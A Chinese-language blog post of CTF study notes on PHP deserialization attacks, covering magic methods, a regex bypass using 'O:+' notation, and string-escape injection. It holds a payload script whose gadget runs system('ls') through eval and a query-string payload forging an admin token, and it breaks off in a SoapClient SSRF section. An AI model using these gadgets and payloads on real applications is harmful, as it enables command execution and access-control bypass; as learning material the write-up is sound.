<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"jingdaqiang.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言边学习边总结 反序列化简介序列化其实就是将数据转化成一种可逆的数据结构，自然，逆向的过程就叫做反序列化 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储，在PHP中，序列化和反序列化一般用做缓存，比如session缓存，cookie等。 解题思路就是想办法通过序列化传入有效内容获取flag,255,256传入参">
<meta property="og:type" content="article">
<meta property="og:title" content="反序列化">
<meta property="og:url" content="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Daq1ang">
<meta property="og:description" content="前言边学习边总结 反序列化简介序列化其实就是将数据转化成一种可逆的数据结构，自然，逆向的过程就叫做反序列化 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储，在PHP中，序列化和反序列化一般用做缓存，比如session缓存，cookie等。 解题思路就是想办法通过序列化传入有效内容获取flag,255,256传入参">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog/jdqblog/source_posts/反序列化/1.png">
<meta property="og:image" content="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog/jdqblog/source_posts/反序列化/2.png">
<meta property="og:image" content="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog/jdqblog/source_posts/反序列化/3.png">
<meta property="article:published_time" content="2021-03-20T14:22:06.475Z">
<meta property="article:modified_time" content="2021-09-11T08:54:37.239Z">
<meta property="article:author" content="六公子买单">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog/jdqblog/source_posts/反序列化/1.png">

<link rel="canonical" href="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>反序列化 | Daq1ang</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Daq1ang</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://jingdaqiang.github.io/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="六公子买单">
      <meta itemprop="description" content="一头努力的菜鸟">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Daq1ang">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          反序列化
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-03-20 22:22:06" itemprop="dateCreated datePublished" datetime="2021-03-20T22:22:06+08:00">2021-03-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-09-11 16:54:37" itemprop="dateModified" datetime="2021-09-11T16:54:37+08:00">2021-09-11</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>边学习边总结</p>
<h2 id="反序列化简介"><a href="#反序列化简介" class="headerlink" title="反序列化简介"></a>反序列化简介</h2><p>序列化其实就是将数据转化成一种可逆的数据结构，自然，逆向的过程就叫做反序列化</p>
<p><strong>serialize</strong> 将对象格式化成有序的字符串</p>
<p><strong>unserialize</strong> 将字符串还原成原来的对象</p>
<p>序列化的目的是方便数据的传输和存储，在PHP中，序列化和反序列化一般用做缓存，比如session缓存，cookie等。</p>
<p>解题思路就是想办法通过序列化传入有效内容获取flag,255,256传入参数覆盖本来的内容使得满足条件,257利用魔法函数结合命令执行</p>
<h3 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">__wakeup() &#x2F;&#x2F;执行unserialize()时，先会调用这个函数</span><br><span class="line">__sleep() &#x2F;&#x2F;执行serialize()时，先会调用这个函数</span><br><span class="line">__destruct() &#x2F;&#x2F;对象被销毁时触发：通过_construct()函数产生所需要的类，销毁时执行指向类内的函数达到应用要求</span><br><span class="line">__call() &#x2F;&#x2F;在对象上下文中调用不可访问的方法时触发</span><br><span class="line">__callStatic() &#x2F;&#x2F;在静态上下文中调用不可访问的方法时触发</span><br><span class="line">__get() &#x2F;&#x2F;用于从不可访问的属性读取数据或者不存在这个键都会调用此方法</span><br><span class="line">__set() &#x2F;&#x2F;用于将数据写入不可访问的属性</span><br><span class="line">__isset() &#x2F;&#x2F;在不可访问的属性上调用isset()或empty()触发</span><br><span class="line">__unset() &#x2F;&#x2F;在不可访问的属性上使用unset()时触发</span><br><span class="line">__toString() &#x2F;&#x2F;把类当作字符串使用时触发</span><br><span class="line">__invoke() &#x2F;&#x2F;当尝试将对象调用为函数时触发</span><br></pre></td></tr></table></figure>


<blockquote>
<p><strong>注意</strong>:</p>
<p>如果类中同时定义了 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.unserialize">__unserialize()</a> 和 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.wakeup">__wakeup()</a> 两个魔术方法，则只有 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.unserialize">__unserialize()</a> 方法会生效，<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.wakeup">__wakeup()</a> 方法会被忽略。</p>
<p>如果类中同时定义了 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.serialize">__serialize()</a> 和 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.sleep">__sleep()</a> 两个魔术方法，则只有 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.serialize">__serialize()</a> 方法会被调用。 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.sleep">__sleep()</a> 方法会被忽略掉。如果对象实现了 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/class.serializable.php">Serializable</a> 接口，接口的 <code>serialize()</code> 方法会被忽略，做为代替类中的 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php#object.serialize">__serialize()</a> 方法会被调用。</p>
<p>应用：261</p>
</blockquote>
<h2 id="绕过部分正则"><a href="#绕过部分正则" class="headerlink" title="绕过部分正则"></a>绕过部分正则</h2><p>preg_match(‘/^O:\d+/‘)匹配序列化字符串是否是对象字符串开头,这在曾经的CTF中也出过类似的考点</p>
<p>利用加号绕过（注意在url里传参时+要编码为%2B）<br>serialize(array(a ) ) ; / / a));//a));//a为要反序列化的对象(序列化结果开头是a，不影响作为数组元素的$a的析构)<br>（原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/113588692%EF%BC%89">https://blog.csdn.net/solitudi/article/details/113588692）</a></p>
<p><code>/[oc]:\d+:/i</code>这题过滤的是   O或C:数字   的格式，注意将所有O:数字的地方都替换成O:+数字,如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class ctfShowUser&#123;</span><br><span class="line">    public $class &#x3D; &#39;info&#39;;</span><br><span class="line">    public function __construct()&#123;</span><br><span class="line">        $this-&gt;class&#x3D;new backDoor();</span><br><span class="line">    &#125;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        $this-&gt;class-&gt;getInfo();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class backDoor&#123;</span><br><span class="line">    public $code&#x3D;&quot;system(&#39;ls&#39;);&quot;;</span><br><span class="line">    public function getInfo()&#123;</span><br><span class="line">        eval($this-&gt;code);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$a&#x3D;serialize(new ctfShowUser());</span><br><span class="line">$b &#x3D; str_replace(&#39;O:11&#39;,&#39;O:+11&#39;, $a);</span><br><span class="line">$c &#x3D; str_replace(&#39;O:8&#39;,&#39;O:+8&#39;, $b);</span><br><span class="line">echo(urlencode($c));</span><br></pre></td></tr></table></figure>
<h2 id="反序列化逃逸"><a href="#反序列化逃逸" class="headerlink" title="反序列化逃逸"></a>反序列化逃逸</h2><p>PHP在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的，同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化，当序列化的长度不对应的时候会出现报错<br>字符逃逸的本质其实也是闭合，分为两种情况，一是字符变多，二是字符变少</p>
<h3 id="字符增多"><a href="#字符增多" class="headerlink" title="字符增多"></a>字符增多</h3><p>根据大佬<a target="_blank" rel="noopener" href="https://y4tacker.blog.csdn.net/">Y4tacker</a>给的源码，我在本地开始测试</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">change</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> str_replace(<span class="string">&quot;x&quot;</span>,<span class="string">&quot;xx&quot;</span>,<span class="variable">$str</span>); <span class="comment">//把反序列化后的一个x替换成为两个</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$name</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="variable">$age</span> = <span class="string">&quot;I am 11&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$arr</span> = <span class="keyword">array</span>(<span class="variable">$name</span>,<span class="variable">$age</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;反序列化字符串：&quot;</span>;</span><br><span class="line">var_dump(serialize(<span class="variable">$arr</span>));  <span class="comment">//显示序列化后的名字和年龄</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br/&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;过滤后:&quot;</span>;</span><br><span class="line"><span class="variable">$old</span> = change(serialize(<span class="variable">$arr</span>));  <span class="comment">//将内容序列化，再调用替换函数把内容中的x变成xx</span></span><br><span class="line"><span class="variable">$new</span> = unserialize(<span class="variable">$old</span>);   <span class="comment">//将替换后的内容反序列化</span></span><br><span class="line">var_dump(<span class="variable">$new</span>);   <span class="comment">//数组形式输出最后内容</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br/&gt;此时，age=<span class="subst">$new</span>[1]&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>正常传入name=daqiang,不含x不存在替换</p>
<p><img src="/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog\jdqblog\source_posts\反序列化\1.png"></p>
<p>当传入内容为name=daqiangx，反序列化失败，由于溢出(s本来是8结果多了一个字符出来)，我们可以利用这一点实现字符串逃逸</p>
<p>报错的主要原因是：由于字符替换，导致序列化后的显示字符串长度与序列化内容所反映的长度不相等</p>
<p><img src="/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog\jdqblog\source_posts\反序列化\2.png"></p>
<p>以上是问题所在</p>
<p>当输入内容为name=daqiangxxxxxxxxxxxxxxxxxxxx”;i:1;s:6:”woaini”;}</p>
<p><code>&quot;;i:1;s:6:&quot;woaini&quot;;&#125;</code>这一部分一共二十个字符</p>
<p>这个内容能解决报错：用20个x替换后多出来的20个x取代多余的”;i:1;s:6:”woaini”;}这20个字符，同时字符串中的”和打印序列化字符串前的”闭合，使得;i:1;s:6:”woaini”;}被舍弃，不参与反序列化。总体来说，通过这样的内容，既满足数目正确不报错</p>
<p>达到改变固有变量值的作用</p>
<p><img src="/2021/03/20/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/blog\jdqblog\source_posts\反序列化\3.png"></p>
<h4 id="demo-262"><a href="#demo-262" class="headerlink" title="demo:262"></a>demo:262</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment"># @message.php //提示还有一个php文件</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">&#x27;user&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;from = <span class="variable">$f</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;msg = <span class="variable">$m</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;to = <span class="variable">$t</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$f</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"><span class="variable">$m</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;m&#x27;</span>];  <span class="comment">//传参</span></span><br><span class="line"><span class="variable">$t</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;t&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$f</span>) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$m</span>) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$t</span>))&#123;</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    <span class="variable">$msg</span> = <span class="keyword">new</span> message(<span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span>);    <span class="comment">//新定义对象为msg</span></span><br><span class="line">    <span class="variable">$umsg</span> = str_replace(<span class="string">&#x27;fuck&#x27;</span>, <span class="string">&#x27;loveU&#x27;</span>, serialize(<span class="variable">$msg</span>));  <span class="comment">//将序列化后的$msg中的fuck用loveU替换</span></span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    setcookie(<span class="string">&#x27;msg&#x27;</span>,base64_encode(<span class="variable">$umsg</span>)); <span class="comment">//</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Your message has been sent&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//message.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">&#x27;user&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;from = <span class="variable">$f</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;msg = <span class="variable">$m</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;to = <span class="variable">$t</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">&#x27;msg&#x27;</span>]))&#123;</span><br><span class="line">   </span><br><span class="line">    </span><br><span class="line">    <span class="variable">$msg</span> = unserialize(base64_decode(<span class="variable">$_COOKIE</span>[<span class="string">&#x27;msg&#x27;</span>])); <span class="comment">//将msg解码再反序列化</span></span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$msg</span>-&gt;token==<span class="string">&#x27;admin&#x27;</span>)&#123;  <span class="comment">//反序列化内容中</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>思路：目的是要让msg序列化再反序列化结果中的token值覆盖为admin，由于str_replace函数使得字符增多，考虑反序列化逃逸</p>
<p>题目分析：题目新定义对象msg，将其序列化，并将结果中的fuck替换成loveU得umsg（字符增1）， 然后提交名为msg,值为base64编码的umsg。然后再重新将msg的值解码赋给msg，如果该内容含token值为admin，则得到flag</p>
<p>复现：</p>
<p>写测试脚本构造对msg进行序列化,模仿例子中的脚本。注意区别：例子是数组，262是对象。定义对象然后序列化新定义的msg，然后输出其序列化结果，参数为1时不进行替换函数，即操作为序列化为umsg,再反序列化成msg，结果正常。</p>
<p>当t值含fuck时，内容序列化，结果中的内容实际长度与其标记长度不一致，再经过反序列化使得长度变化，目的将”;s:5:”token”;s:4:”user”;}变成无用字符串，同时加入整体反序列化结果含token=admin的有效内容    “;s:5”token”;s:5:”admin”;}，总结就是用loveU来加位数拓展字符到让”;s:5”token”;s:5:”admin”;}完全进入：为27位即需要27个fuck(不用考虑”;s:5:”token”;s:4:”user”;}，admin后面的括号自动会把后面的内容作废)     总结：考虑fuck数只考虑有效内容的长度就行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">&#x27;user&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;from = <span class="variable">$f</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;msg = <span class="variable">$m</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;to = <span class="variable">$t</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$f</span> = <span class="number">1</span>;</span><br><span class="line"><span class="variable">$m</span> = <span class="number">1</span>;  <span class="comment">//传参</span></span><br><span class="line"><span class="variable">$t</span> =<span class="variable">$_GET</span>[<span class="string">&#x27;t&#x27;</span>];</span><br><span class="line"><span class="comment">//t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck&quot;;s:5:&quot;token&quot;;s:5:&quot;admin&quot;;&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$msg</span> = <span class="keyword">new</span> message(<span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;反序列化字符串：&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span>(serialize(<span class="variable">$msg</span>));  <span class="comment">//</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br/&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;过滤后:&quot;</span>;</span><br><span class="line"><span class="variable">$umsg</span> = str_replace(<span class="string">&#x27;fuck&#x27;</span>, <span class="string">&#x27;loveU&#x27;</span>, serialize(<span class="variable">$msg</span>));</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span>(<span class="variable">$umsg</span>);   </span><br><span class="line">   </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f&#x3D;1&amp;m&#x3D;1&amp;t&#x3D;fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck&quot;;s:5:&quot;token&quot;;s:5:&quot;admin&quot;;&#125;  &#x2F;&#x2F;传参然后访问message.php得flag</span><br></pre></td></tr></table></figure>
<h2 id="SoapClient"><a href="#SoapClient" class="headerlink" title="SoapClient"></a>SoapClient</h2><p>php中的scapClient类可以创建soap数据报文，与wsdl接口进行交互</p>
<h3 id="SoapClient-call方法进行SSRF"><a href="#SoapClient-call方法进行SSRF" class="headerlink" title="SoapClient __call方法进行SSRF"></a>SoapClient __call方法进行SSRF</h3><ul>
<li><pre><code>php在安装php-soap拓展后，可以反序列化原生类SoapClient，来发送http post请求。(需手动开启)
必须调用SoapClient不存在的方法，触发SoapClient的__call魔术方法。
通过CRLF来添加请求体：SoapClient可以指定请求的user-agent头，通过添加换行符的形式来加入其他请求内容
仅限于http/https协议
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- &#x2F;&#x2F;soap是什么：</span><br><span class="line">  soap是webServer的三要素之一(SOAP、WSDL、UDDI)</span><br><span class="line">  